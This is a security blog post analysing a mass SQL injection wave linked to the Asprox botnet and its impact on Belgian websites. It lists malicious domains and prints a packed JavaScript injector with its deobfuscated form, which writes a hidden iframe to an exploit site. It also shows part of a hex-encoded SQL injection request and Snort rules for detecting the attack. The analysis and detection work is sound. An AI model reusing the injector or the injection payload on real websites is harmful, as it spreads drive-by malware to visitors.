Third sql injection wave and the impact on Belgian websites

Wednesday

Warning: I strongly suggest that readers do NOT visit websites mentioned here. They should be considered dangerous and capable of infecting your system.

Several website were warning us that the sql injections are still increasing in numbers and that other domainnames are being used for the injection. For example F-secure has this to say:

Previously, these attacks have primarily pointed to IP addresses in China and we've seen the following domains being used in addition to the ones we've mentioned previously:

www.wowgm1.cn
www.killwow1.cn
www.wowyeye.cn
vb008.cn
9i5t.cn
computershello.cn

We've now seen other domains being used as well such as direct84.com which is inserted by an SQL injection tool (detected as HackTool:W32/Agent.B) distributed to the Asprox botnet. SecureWorks has a nice write-up available. The direct84.com domain fast-fluxes to several different IPs in Europe, Israel and North America.

SANS ISC had the following interesting bit to add:

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode
(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return[e]}];e=functio
n(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp}('8(b.e==\'i-2\
'){}4{3.g("<9d=7:\/\/h.c.2\/a.6 f="15="><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index
|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}))

After deobfuscating the code, we get this:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}

In other words, the code checks if the system language variable is set to ZH-CN (which is set on systems running in Chinese) and redirects you to the site hosting exploit only if that is not true. So the rant might really be from the author, after all since the code is attacking all non-Chinese machines. Are we getting more serious with this or the bottom line is still (and only) information stealing and money.

How considerate, or should I say patriotic. So the results are in and the count is in the hundreds of thousands are infected with the "m.js" javascript.

Infected .be sites amounted to 96 at the moment. There aren't that many, but we are amongst the victims. I notified the Belnet CERT as soon as I could.

The attack request looks like this more or less like this:

GET /page.asp?id=425;DECLARE%20@S%20NVARCHAR(4000);SET%20

@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630 0680061007200280032003500350029002C00400043002000760061007200630068006 10072002800320035003500290020004400450043004C00410052004500200www.example.com
HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
*/*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25
Host: www.example.com
Connection: Close

Strange thing to note is that both Firefox and Opera are used together in the User-agent string. There has been a similar attack targeting World of Warcraft forums that also links to .cn (Chinese) domains. Read the analysis on shadowserver.org.

Secureworks gives us a Snort rule to detect bot spreading by email:

The following Snort signatures could be used to reliably detect spam coming into an MTA from an Asprox bot:

alert tcp any any -> any 25 (msg:"Asprox-style Message ID"; flags:A+; dsize:<80; href="http://www.secureworks.com/research/threats/danmecasprox">http://www.secureworks.com/research/threats/danmecasprox sid:1001290; rev:1;)

alert tcp any any -> any 25 (msg:"Asprox phishing email detected"; flags:A+; content:"From|3a20|"; depth:6; content:
"|0d0a|Bcc|3a20|"; within:150; flowbits:isset,asproxmessageid; http://www.secureworks.com/research/threats/danmecasprox sid:1001291; rev:1;)

Note that this signatures does not guarantees detection of future variants or attacks.

Related posts: